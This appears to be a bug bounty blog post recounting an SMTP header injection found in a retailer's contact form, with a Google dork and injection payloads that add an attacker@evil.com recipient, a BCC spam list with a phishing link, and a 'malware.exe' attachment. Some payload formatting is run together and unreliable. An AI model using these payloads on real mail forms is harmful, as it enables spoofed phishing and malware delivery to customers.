.png)
1 day ago
6 BOOK THIS SPACE FOR AD
ARTICLE AD
Bug bounty hunting is full of surprises, and sometimes, the easiest vulnerabilities can pay the most. This is the story of how I stumbled upon an SMTP Injection bug, reported it, and earned $800 in just half an hour. I’ll also share the exact techniques, tools, and payloads I used so you can try it yourself!
Like any other day, I was reconnaissance scanning for potential targets. I found a large e-commerce website that had an email-based contact form.
Here’s what I noticed:
The contact form had fields for Name, Email, Subject, and Message.It sent an automated confirmation email once submitted.The email address I entered was reflected in the email body.Immediately, my hacker instincts kicked in — what if the input was vulnerable to SMTP Injection?
To maximize my chances of finding vulnerabilities, I used the following reconnaissance techniques:
I used Google Dorking to find email-based contact forms:
inurl:/contact.php OR inurl:/feedback.php "email" site:target.comUsing Burp Suite, I intercepted the request and tested whether the email field was reflected in the response:
GET /contact?email=test@example.com HTTP/1.1Host: target.com
If the email appeared in the response, it meant potential SMTP Injection or Email Spoofing.
I submitted a normal test message to see what the email looked like. Then, I injected an SMTP payload into the email field:
victim@example.comRCPT TO: attacker@evil.com
A few seconds later, I received two emails — one at my original email and another at my attacker-controlled email.
💡 Bingo! The server was accepting additional SMTP commands!
To check the severity, I tried a more advanced payload to manipulate the email structure and send messages on behalf of the company:
"attacker@example.com\nBCC: masslist@spam.com\nSubject: URGENT Security Alert!\nBody: Your account has been compromised. Click here to secure it: https://evil.com"This spoofed an email that appeared to come directly from the company. If an attacker abused this, they could send phishing emails to thousands of customers!
I wanted to see if I could inject attachments into emails to increase the impact.
From: "support@target.com"\nTo: victim@example.com\n
Subject: Urgent Action Required\n
Content-Type: multipart/mixed; boundary="XYZ"--XYZ
Content-Type: text/plainYour account is compromised! Click below to verify:https://evil.com--XYZ
Content-Type: application/octet-stream; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"[malicious binary content]--XYZ--
This payload would attach a malware file to the email, making it a high-critical vulnerability.
I quickly drafted a professional report and submitted it to their bug bounty program on HackerOne.
Vulnerability: SMTP Injection in Contact FormImpact: Allows email spoofing, phishing, unauthorized email sending, and malware injectionSteps to Reproduce: Provided multiple payloads and email logsProof of Concept Video: Attached a screen recording showing real-time exploitationWithin 30 minutes, I got a response from their security team:
🚀 “We have verified the issue and marked it as HIGH severity. Expect a payout soon.”
A day later, I received $800 in my HackerOne account! 🎉
Always check email-based forms — They are often vulnerable to SMTP Injection.Try multiple payloads — Even if a basic test fails, an advanced payload might work.Increase impact — Companies pay more for vulnerabilities that pose real-world threats.Bug bounty is about creativity — Sometimes, simple bugs turn into big rewards.SMTP Injection can escalate — By injecting attachments, you can turn a medium bug into a critical one.📖 Medium Blog: TheIndianNetwork
📺 YouTube Channel: TheIndianNetwork
📧 Email: theindiannetwork@protonmail.com
💰 Go hunt, find a bug, and make money today!
Bengali (Bangladesh) · 
English (United States) ·